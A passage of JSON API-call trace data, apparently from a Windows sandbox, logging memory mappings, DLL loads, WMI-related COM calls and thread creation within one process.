            "parentcaller": "0x7ff79aafb501",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000204"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c100000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x00143000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 10
          },
          {
            "timestamp": "2025-11-20 10:58:31,632",
            "thread_id": "1388",
            "caller": "0x7ff79aafc378",
            "parentcaller": "0x7ff79aafb501",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c100000"
              },
              {
                "name": "RegionSize",
                "value": "0x00143000"
              }
            ],
            "repeated": 0,
            "id": 11
          },
          {
            "timestamp": "2025-11-20 10:58:31,632",
            "thread_id": "1388",
            "caller": "0x7ff79aafc378",
            "parentcaller": "0x7ff79aafb501",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000208"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100021",
                "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\kernel.appcore.dll"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 12
          },
          {
            "timestamp": "2025-11-20 10:58:31,632",
            "thread_id": "1388",
            "caller": "0x7ff79aafc378",
            "parentcaller": "0x7ff79aafb501",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x0000020c"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedea70000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x00012000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000080",
                "pretty_value": "PAGE_EXECUTE_WRITECOPY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 13
          },
          {
            "timestamp": "2025-11-20 10:58:31,632",
            "thread_id": "1388",
            "caller": "0x7ff79aafc378",
            "parentcaller": "0x7ff79aafb501",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\kernel.appcore"
              },
              {
                "name": "DllBase",
                "value": "0x7ffedea70000"
              }
            ],
            "repeated": 0,
            "id": 14
          },
          {
            "timestamp": "2025-11-20 10:58:31,632",
            "thread_id": "1388",
            "caller": "0x7ff79aafc378",
            "parentcaller": "0x7ff79aafb501",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x0000020c"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1390000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x00082000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000080",
                "pretty_value": "PAGE_EXECUTE_WRITECOPY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 15
          },
          {
            "timestamp": "2025-11-20 10:58:31,632",
            "thread_id": "1388",
            "caller": "0x7ff79aafc378",
            "parentcaller": "0x7ff79aafb501",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\System32\\bcryptPrimitives"
              },
              {
                "name": "DllBase",
                "value": "0x7ffee1390000"
              }
            ],
            "repeated": 0,
            "id": 16
          },
          {
            "timestamp": "2025-11-20 10:58:31,647",
            "thread_id": "1388",
            "caller": "0x7ff79aafc378",
            "parentcaller": "0x7ff79aafb501",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000214"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100001",
                "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "\\Device\\CNG"
              },
              {
                "name": "ShareAccess",
                "value": "7",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 17
          },
          {
            "timestamp": "2025-11-20 10:58:31,647",
            "thread_id": "1388",
            "caller": "0x7ff79aafc378",
            "parentcaller": "0x7ff79aafb501",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2b9cf000"
              },
              {
                "name": "RegionSize",
                "value": "0x00006000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 18
          },
          {
            "timestamp": "2025-11-20 10:58:31,647",
            "thread_id": "1388",
            "caller": "0x7ff79aafc5a5",
            "parentcaller": "0x7ff79aafb501",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2b9d5000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 19
          },
          {
            "timestamp": "2025-11-20 10:58:31,647",
            "thread_id": "1388",
            "caller": "0x7ff79aafc5a5",
            "parentcaller": "0x7ff79aafb501",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2b9d7000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 20
          },
          {
            "timestamp": "2025-11-20 10:58:31,647",
            "thread_id": "1388",
            "caller": "0x7ff79aafc5a5",
            "parentcaller": "0x7ff79aafb501",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2b9d9000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 21
          },
          {
            "timestamp": "2025-11-20 10:58:31,647",
            "thread_id": "1388",
            "caller": "0x7ff79aafc60b",
            "parentcaller": "0x7ff79aafb501",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\System32\\clbcatq"
              },
              {
                "name": "DllBase",
                "value": "0x7ffee2c20000"
              }
            ],
            "repeated": 0,
            "id": 22
          },
          {
            "timestamp": "2025-11-20 10:58:31,647",
            "thread_id": "1388",
            "caller": "0x7ff79aafc60b",
            "parentcaller": "0x7ff79aafb501",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "0000034B-0000-0000-C000-000000000046"
              },
              {
                "name": "ClsContext",
                "value": "0x00000001",
                "pretty_value": "CLSCTX_INPROC_SERVER"
              },
              {
                "name": "riid",
                "value": "0000015B-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 23
          },
          {
            "timestamp": "2025-11-20 10:58:31,647",
            "thread_id": "1388",
            "caller": "0x7ff79aafc2ca",
            "parentcaller": "0x7ff79aafb513",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000254"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c060000"
              },
              {
                "name": "SectionOffset",
                "value": "0x3f67acf430"
              },
              {
                "name": "ViewSize",
                "value": "0x00001000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 24
          },
          {
            "timestamp": "2025-11-20 10:58:31,647",
            "thread_id": "1388",
            "caller": "0x7ff79aafc1b9",
            "parentcaller": "0x7ff79aafb518",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c0f7000"
              },
              {
                "name": "RegionSize",
                "value": "0x00008000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 25
          },
          {
            "timestamp": "2025-11-20 10:58:31,647",
            "thread_id": "1388",
            "caller": "0x7ff79aafc1b9",
            "parentcaller": "0x7ff79aafb518",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x21e2b9a0150"
              },
              {
                "name": "DesiredAccess",
                "value": "0xc0100080",
                "pretty_value": "GENERIC_READ|GENERIC_WRITE|FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "0"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "no"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 9,
            "id": 26
          },
          {
            "timestamp": "2025-11-20 10:58:31,647",
            "thread_id": "1388",
            "caller": "0x7ff79aafc1b9",
            "parentcaller": "0x7ff79aafb518",
            "category": "threading",
            "api": "CreateRemoteThreadEx",
            "status": true,
            "return": "0x00000270",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "StartRoutine",
                "value": "0x7ffed94d3ca0"
              },
              {
                "name": "Parameter",
                "value": "0x21e2b9da610"
              },
              {
                "name": "CreationFlags",
                "value": "0x00000000"
              },
              {
                "name": "ThreadId",
                "value": "4100"
              },
              {
                "name": "ProcessId",
                "value": "3164"
              }
            ],
            "repeated": 0,
            "id": 27
          },
          {
            "timestamp": "2025-11-20 10:58:31,647",
            "thread_id": "1388",
            "caller": "0x7ff79aafc1ff",
            "parentcaller": "0x7ff79aafb518",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c100000"
              },
              {
                "name": "RegionSize",
                "value": "0x00100000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 28
          },
          {
            "timestamp": "2025-11-20 10:58:31,647",
            "thread_id": "1388",
            "caller": "0x7ff79aafc1ff",
            "parentcaller": "0x7ff79aafb518",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c100000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 29
          },
          {
            "timestamp": "2025-11-20 10:58:31,647",
            "thread_id": "1388",
            "caller": "0x7ff79aafc1ff",
            "parentcaller": "0x7ff79aafb518",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2b9dc000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 30
          },
          {
            "timestamp": "2025-11-20 10:58:31,647",
            "thread_id": "1388",
            "caller": "0x7ff79aafc1ff",
            "parentcaller": "0x7ff79aafb518",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2b9dd000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 31
          },
          {
            "timestamp": "2025-11-20 10:58:31,647",
            "thread_id": "1388",
            "caller": "0x7ff79aafc1ff",
            "parentcaller": "0x7ff79aafb518",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c102000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 32
          },
          {
            "timestamp": "2025-11-20 10:58:31,647",
            "thread_id": "1388",
            "caller": "0x7ff79aafc1ff",
            "parentcaller": "0x7ff79aafb518",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c103000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 33
          },
          {
            "timestamp": "2025-11-20 10:58:31,647",
            "thread_id": "1388",
            "caller": "0x7ff79aafc1ff",
            "parentcaller": "0x7ff79aafb518",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2b9de000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 34
          },
          {
            "timestamp": "2025-11-20 10:58:31,647",
            "thread_id": "1388",
            "caller": "0x7ff79aafc1ff",
            "parentcaller": "0x7ff79aafb518",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2b9df000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 35
          },
          {
            "timestamp": "2025-11-20 10:58:31,647",
            "thread_id": "1388",
            "caller": "0x7ff79aafc1ff",
            "parentcaller": "0x7ff79aafb518",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c106000"
              },
              {
                "name": "RegionSize",
                "value": "0x00005000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 36
          },
          {
            "timestamp": "2025-11-20 10:58:31,647",
            "thread_id": "1388",
            "caller": "0x7ff79aafc1ff",
            "parentcaller": "0x7ff79aafb518",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2b9e1000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 37
          },
          {
            "timestamp": "2025-11-20 10:58:31,647",
            "thread_id": "1388",
            "caller": "0x7ff79aafc1ff",
            "parentcaller": "0x7ff79aafb518",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2b9e3000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 38
          },
          {
            "timestamp": "2025-11-20 10:58:31,647",
            "thread_id": "1388",
            "caller": "0x7ff79aafc1ff",
            "parentcaller": "0x7ff79aafb518",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c10b000"
              },
              {
                "name": "RegionSize",
                "value": "0x00005000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 39
          },
          {
            "timestamp": "2025-11-20 10:58:33,725",
            "thread_id": "1388",
            "caller": "0x7ff79aafb555",
            "parentcaller": "0x7ff79aafc77a",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\system32\\wbem\\wbemprox"
              },
              {
                "name": "DllBase",
                "value": "0x7ffedc850000"
              }
            ],
            "repeated": 0,
            "id": 40
          },
          {
            "timestamp": "2025-11-20 10:58:33,725",
            "thread_id": "1388",
            "caller": "0x7ff79aafb555",
            "parentcaller": "0x7ff79aafc77a",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\wbem\\wbemprox.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedc850000"
              }
            ],
            "repeated": 0,
            "id": 41
          },
          {
            "timestamp": "2025-11-20 10:58:33,725",
            "thread_id": "1388",
            "caller": "0x7ff79aafb555",
            "parentcaller": "0x7ff79aafc77a",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "4590F811-1D3A-11D0-891F-00AA004B2E24"
              },
              {
                "name": "ClsContext",
                "value": "0x00000005",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_LOCAL_SERVER"
              },
              {
                "name": "riid",
                "value": "00000000-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 42
          },
          {
            "timestamp": "2025-11-20 10:58:33,725",
            "thread_id": "4244",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2b9ee000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 43
          },
          {
            "timestamp": "2025-11-20 10:58:33,725",
            "thread_id": "4244",
            "caller": "0x7ffee10f6f4c",
            "parentcaller": "0x7ffee336ef53",
            "category": "system",
            "api": "NtDuplicateObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SourceProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "SourceHandle",
                "value": "0xfffffffe"
              },
              {
                "name": "TargetProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "TargetHandle",
                "value": "0x000002b0"
              },
              {
                "name": "Options",
                "value": "0x00000002"
              }
            ],
            "repeated": 0,
            "id": 44
          },
          {
            "timestamp": "2025-11-20 10:58:33,725",
            "thread_id": "4244",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2b9ef000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 45
          },
          {
            "timestamp": "2025-11-20 10:58:33,725",
            "thread_id": "4244",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2b9f1000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 46
          },
          {
            "timestamp": "2025-11-20 10:58:33,741",
            "thread_id": "1388",
            "caller": "0x7ff79aafb5bc",
            "parentcaller": "0x7ff79aafc77a",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "0000032A-0000-0000-C000-000000000046"
              },
              {
                "name": "ClsContext",
                "value": "0x00000001",
                "pretty_value": "CLSCTX_INPROC_SERVER"
              },
              {
                "name": "riid",
                "value": "00000149-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 47
          },
          {
            "timestamp": "2025-11-20 10:58:33,741",
            "thread_id": "1388",
            "caller": "0x7ff79aafb5bc",
            "parentcaller": "0x7ff79aafc77a",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "00000339-0000-0000-C000-000000000046"
              },
              {
                "name": "ClsContext",
                "value": "0x00000403",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD"
              },
              {
                "name": "riid",
                "value": "00000003-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 48
          },
          {
            "timestamp": "2025-11-20 10:58:33,741",
            "thread_id": "1388",
            "caller": "0x7ff79aafb5bc",
            "parentcaller": "0x7ff79aafc77a",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\system32\\wbem\\wbemsvc"
              },
              {
                "name": "DllBase",
                "value": "0x7ffed94f0000"
              }
            ],
            "repeated": 0,
            "id": 49
          },
          {
            "timestamp": "2025-11-20 10:58:33,741",
            "thread_id": "1388",
            "caller": "0x7ff79aafb5bc",
            "parentcaller": "0x7ff79aafc77a",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\wbem\\wbemsvc.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed94f0000"
              }
            ],
            "repeated": 0,
            "id": 50
          },
          {
            "timestamp": "2025-11-20 10:58:33,741",
            "thread_id": "1388",
            "caller": "0x7ff79aafb5bc",
            "parentcaller": "0x7ff79aafc77a",
            "category": "com",
            "api": "CoCreateInstanceEx",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "8BC3F05E-D86B-11D0-A075-00C04FB68820"
              },
              {
                "name": "ClsContext",
                "value": "0x00000014",
                "pretty_value": "CLSCTX_LOCAL_SERVER|CLSCTX_REMOTE_SERVER"
              },
              {
                "name": "ServerName",
                "value": ""
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 51
          },
          {
            "timestamp": "2025-11-20 10:58:33,741",
            "thread_id": "1388",
            "caller": "0x7ff79aafb5bc",
            "parentcaller": "0x7ff79aafc77a",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\wbem\\fastprox.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed3fc0000"
              }
            ],
            "repeated": 0,
            "id": 52
          },
          {
            "timestamp": "2025-11-20 10:58:33,741",
            "thread_id": "1388",
            "caller": "0x7ff79aafb5bc",
            "parentcaller": "0x7ff79aafc77a",
            "category": "com",
            "api": "CoGetClassObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "E7D35CFA-348B-485E-B524-252725D697CA"
              },
              {
                "name": "ClsContext",
                "value": "0x80000001",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL"
              },
              {
                "name": "riid",
                "value": "D5F569D0-593B-101A-B569-08002B2DBF7A"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 53
          },
          {
            "timestamp": "2025-11-20 10:58:33,741",
            "thread_id": "1388",
            "caller": "0x7ff79aafdafb",
            "parentcaller": "0x7ff79aafb615",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "4590F812-1D3A-11D0-891F-00AA004B2E24"
              },
              {
                "name": "ClsContext",
                "value": "0x00000403",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD"
              },
              {
                "name": "riid",
                "value": "00000003-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 2,
            "id": 54
          },
          {
            "timestamp": "2025-11-20 10:58:33,757",
            "thread_id": "1388",
            "caller": "0x7ff79aafb1d8",
            "parentcaller": "0x7ff79aafb33c",
            "category": "threading",
            "api": "CreateRemoteThreadEx",
            "status": true,
            "return": "0x000002cc",
            "arguments": [
              {
